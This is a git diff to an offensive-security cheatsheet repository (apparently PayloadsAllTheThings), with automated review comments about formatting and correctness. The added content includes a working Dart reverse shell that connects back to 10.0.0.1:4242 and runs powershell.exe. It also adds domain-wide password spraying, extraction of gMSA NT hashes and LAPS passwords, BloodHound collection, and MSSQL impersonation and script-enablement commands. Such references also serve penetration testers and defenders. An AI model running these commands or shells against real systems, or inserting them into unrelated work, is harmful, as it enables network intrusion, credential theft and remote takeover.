diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 30fcd4e..a3e58f8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -37,6 +37,7 @@ - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service) - [Password in AD User comment](#password-in-ad-user-comment) - [Reading LAPS Password](#reading-laps-password) + - [Reading GMSA Password](#reading-gmsa-password) - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - [Using Mimikatz](#using-mimikatz) - [Using Meterpreter](#using-meterpreter) @@ -195,12 +196,12 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound) # run the collector on the machine using SharpHound.exe # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe -.\SharpHound.exe (from resources/Ingestor) -.\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 -.\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 .\SharpHound.exe -c all -d active.htb -SearchForest .\SharpHound.exe --EncryptZip --ZipFilename export.zip -.\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder +.\SharpHound.exe -c all,GPOLocalGroup +.\SharpHound.exe -c all --LDAPUser --LDAPPass --JSONFolder +.\SharpHound.exe -c all -d active.htb --LDAPUser --LDAPPass --domaincontroller 10.10.10.100 + # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 
@@ -221,6 +222,9 @@ root@payload$ apt install bloodhound # start BloodHound and the database root@payload$ neo4j console +# or use docker +root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j + root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` @@ -988,6 +992,17 @@ Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` +Using `DomainPasswordSpray` to spray a password against all users of a domain. + +```powershell +# https://github.com/dafthack/DomainPasswordSpray +Invoke-DomainPasswordSpray -Password Summer2021! + +# /!\ be careful with the account lockout ! +Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt + +``` + #### Spray passwords against the RDP service Using RDPassSpray to target RDP services. 
@@ -1019,6 +1034,35 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` +### Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. + +#### GMSA Attributes in the Active Directory +* **msDS-GroupMSAMembership** (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password. +* **msds-ManagedPassword** - This attribute contains a BLOB with password information for group-managed service accounts. +* **msDS-ManagedPasswordId** - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* **msDS-ManagedPasswordInterval** - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +#### Extract NT hash from the Active Directory + +* GMSAPasswordReader (C#) + ```ps1 + # https://github.com/rvazarkar/GMSAPasswordReader + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + ### Reading LAPS Password 
@@ -1036,6 +1080,11 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users +* CrackMapExec + ```powershell + crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps + ``` + * Powerview ```powershell PS > Import-Module .\PowerView.ps1 diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 8b766f2..2b6fa34 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -36,7 +36,7 @@ * [Python](#python) * [R](#r) * [Audit Checks](#audit-checks) - * [Find and exploit impersonation opportunities](#find-and-explit-impersonation-opportunities) + * [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) * [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) * [Manual SQL Server Queries](#manual-sql-server-queries) * [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) @@ -268,6 +268,13 @@ Get-SQLAgentJob -Instance "" -username sa -Password Pas ## External Scripts +:warning: You need to enable **external scripts**. + +```sql +sp_configure 'external scripts enabled', 1; +RECONFIGURE; +``` + ## Python: ```ps1 @@ -285,6 +292,14 @@ Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance " select is_member('db_owner'); + SQL> execute as user = 'dbo' + SQL> SELECT is_srvrolemember('sysadmin') + ``` + ```ps1 Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "" -Exploit -Verbose 
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d960038..4ee06f6 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -7,6 +7,7 @@ * [Bash TCP](#bash-tcp) * [Bash UDP](#bash-udp) * [C](#c) + * [Dart](#dart) * [Golang](#golang) * [Groovy Alternative 1](#groovy-alternative-1) * [Groovy](#groovy) @@ -346,6 +347,29 @@ int main(void){ } ``` +### Dart + +```java +import 'dart:io'; +import 'dart:convert'; + +main() { + Socket.connect("10.0.0.1", 4242).then((socket) { + socket.listen((data) { + Process.start('powershell.exe', []).then((Process process) { + process.stdin.writeln(new String.fromCharCodes(data).trim()); + process.stdout + .transform(utf8.decoder) + .listen((output) { socket.write(output); }); + }); + }, + onDone: () { + socket.destroy(); + }); + }); +} +``` + ## Meterpreter Shell ### Windows Staged reverse TCP diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index a7464a7..ff80a25 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -2,6 +2,7 @@ ## Summary +* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) * [Dont use net webclient](#Dont-use-net-webclient) * [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch) @@ -17,6 +18,10 @@ * [Nishang all in one](#Nishang-all-in-one) * [Adam Chesters Patch](#Adam-Chester-Patch) +## Which Endpoint Protection is Using AMSI + +* https://github.com/subat0mik/whoamsi/wiki/Which-Endpoint-Protection-is-Using-AMSI%3F + # Patching amsi.dll AmsiScanBuffer by rasta-mouse 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index eea8995..9d3ee8b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -242,6 +242,7 @@ List all network shares ```powershell net share +powershell Find-DomainShare -ComputerDomain domain.local ``` SNMP Configuration @@ -272,8 +273,7 @@ PS C:\> Set-MpPreference -DisableIOAVProtection $true List AppLocker rules ```powershell -PS C:\> $a = Get-ApplockerPolicy -effective -PS C:\> $a.rulecollections +PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` ### Powershell diff --git a/Server Side Request Forgery/Images/SSRF_PDF.png b/Server Side Request Forgery/Images/SSRF_PDF.png new file mode 100644 index 0000000..80a97ba Binary files /dev/null and b/Server Side Request Forgery/Images/SSRF_PDF.png differ diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f25775b..c3a2016 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,7 +223,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) ### Bypassing using a redirect [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) 
@@ -433,6 +433,8 @@ gopher://127.0.0.1:6379/_save ## SSRF exploiting PDF file +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.jpg?raw=true) + Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) ```powershell
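Review bot: In the table-of-contents hunk of `Active Directory Attack.md`, the new entry `- [Reading GMSA Password](#reading-gmsa-password)` is placed after the LAPS entry, but the later hunk inserts the GMSA section before `### Reading LAPS Password` in the body; swap the two TOC lines so the table of contents follows document order.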
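Review bot: In the SharpHound hunk, the added lines `.\SharpHound.exe -c all --LDAPUser --LDAPPass --JSONFolder` and `.\SharpHound.exe -c all -d active.htb --LDAPUser --LDAPPass --domaincontroller 10.10.10.100` pass the credential and output switches without values, so they fail to parse if copied as-is, whereas the removed lines carried `myuser`/`mypass` placeholders. Suggest restoring placeholders, e.g. `--LDAPUser <user> --LDAPPass <pass> --JSONFolder <dir>`. The case change to `--LDAPUser`/`--LDAPPass` is consistent with the existing `--CollectionMethod` line.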
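Review bot: The added `docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j` sets the neo4j password to `bloodhound`, but the unchanged line below still reads `user:neo4J, pass:neo4j`; either use `NEO4J_AUTH=neo4j/neo4j` or update the login line (and fix the `neo4J` capitalization while touching it). Also, `docker run` without `-d` keeps the container in the foreground, so `./bloodhound --no-sandbox` on the next line needs a second terminal, the same caveat as `neo4j console` above.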
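Review bot: In the DomainPasswordSpray hunk, the lockout warning `# /!\ be careful with the account lockout !` sits above the second command only, yet the first call `Invoke-DomainPasswordSpray -Password Summer2021!` has no `-UserList` and therefore covers every enabled domain user, which is the call most likely to trip the lockout threshold; move the warning above the first command or the fence. The block also needs `Import-Module .\DomainPasswordSpray.ps1` before the first call, and there is a stray blank line before the closing fence.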
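Review bot: In the GMSA hunk, the bullet labelled `Active Directory Powershell` under `#### Extract NT hash from the Active Directory` relies on `ConvertFrom-ADManagedPasswordBlob` and `ConvertTo-NTHash`, which are DSInternals cmdlets, not part of the ActiveDirectory module; only `Get-ADServiceAccount` is. Rename the bullet (e.g. `ActiveDirectory module + DSInternals`) and add `Import-Module DSInternals` before `$mp = ConvertFrom-ADManagedPasswordBlob $blob`. Smaller points: the blockquote on GMSAs reads as a quotation but names no source, so add the link; the attribute list mixes `msds-ManagedPassword` with `msDS-...` casing; and these fences use `ps1` while the rest of the file uses `powershell`.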
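Review bot: The added `crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps` line is fenced as `powershell`, though it is a Linux CLI invocation like the `ldapdomaindump` example earlier in the file; a plain fence or `bash` fits better. A one-line comment that the `laps` module only returns a password when the supplied account has read rights on `ms-Mcs-AdmPwd` (Domain Admins by default, as the blockquote just above states) would keep the example aligned with that note.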
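Review bot: In the `## External Scripts` hunk of the MSSQL cheatsheet, the `:warning:` line says external scripts must be enabled but not what that requires: `sp_configure 'external scripts enabled', 1; RECONFIGURE;` is a server-level configuration change that needs the `ALTER SETTINGS` permission (sysadmin in practice) and is the kind of change SQL Server auditing records, so state the required privilege next to the warning. Using `EXEC sp_configure ...` also makes the snippet safe to paste mid-batch.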
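Review bot: In the impersonation hunk, the added `SQL> execute as user = 'dbo'` followed by `SQL> SELECT is_srvrolemember('sysadmin')` leaves the session in the impersonated context; add a `SQL> REVERT` line after the check so later queries in the cheatsheet run as the original login. A short comment that the check returns 1 only when the database is TRUSTWORTHY and owned by a sysadmin login would tie it to the `Find databases that have been configured as trustworthy` entry in the TOC.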
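Review bot: The new Dart block in `Reverse Shell Cheatsheet.md` is fenced as `java`; tag it `dart` so it highlights correctly and is searchable by language. Since it hardcodes `Process.start('powershell.exe', [])`, the `### Dart` heading or a comment should say the snippet is Windows-only, unlike the neighbouring C and Golang entries. The `new` in `new String.fromCharCodes(data)` is optional in current Dart and can be dropped.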
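Review bot: The added `## Which Endpoint Protection is Using AMSI` heading in `Windows - AMSI Bypass.md` is level 2, while the following existing heading `# Patching amsi.dll AmsiScanBuffer by rasta-mouse` and the other sections use level 1; use `#` so the new section is a sibling of the others rather than a child of `## Summary`. The section body is a bare URL; one line saying that the linked wiki page lists which EDR/AV products register an AMSI provider would help readers decide whether to follow it.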
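Review bot: The added `powershell Find-DomainShare -ComputerDomain domain.local` in the network shares hunk is not a native command: `Find-DomainShare` is a PowerView function that only exists after PowerView is loaded (e.g. `Import-Module .\PowerView.ps1`), and prefixing `powershell` inside an already-PowerShell block spawns a child shell that will not have it. Drop the `powershell` prefix and label the line `# PowerView`, as other PowerView examples in the file do.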
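Review bot: The added line `PowerView` at the top of the AppLocker block is a stray token: `Get-AppLockerPolicy` comes from the built-in AppLocker module, not PowerView, and a bare `PowerView` line would be executed as a command and fail. Remove it (it appears to have been intended for the `Find-DomainShare` change in the previous hunk). The replacement `PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections` itself is fine, with the cmdlet name and `-Effective` correctly cased.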
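Review bot: The edited image line in `Server Side Request Forgery/README.md` changes only the alt text to `WeakParser.png?raw=true` while the URL still ends in `WeakParser.jpg?raw=true`; if the file in `Images/` is the `.jpg`, the alt text should match it, and ideally describe the figure (weak URL parser behaviour) rather than repeat the URL.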
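Review bot: The new image line under `## SSRF exploiting PDF file` links `Images/SSRF_PDF.jpg?raw=true`, but the file added in this commit is `Server Side Request Forgery/Images/SSRF_PDF.png` (see the `new file mode 100644` entry above), so the image will 404; change the URL extension to `.png` and give the alt text a short description instead of the URL.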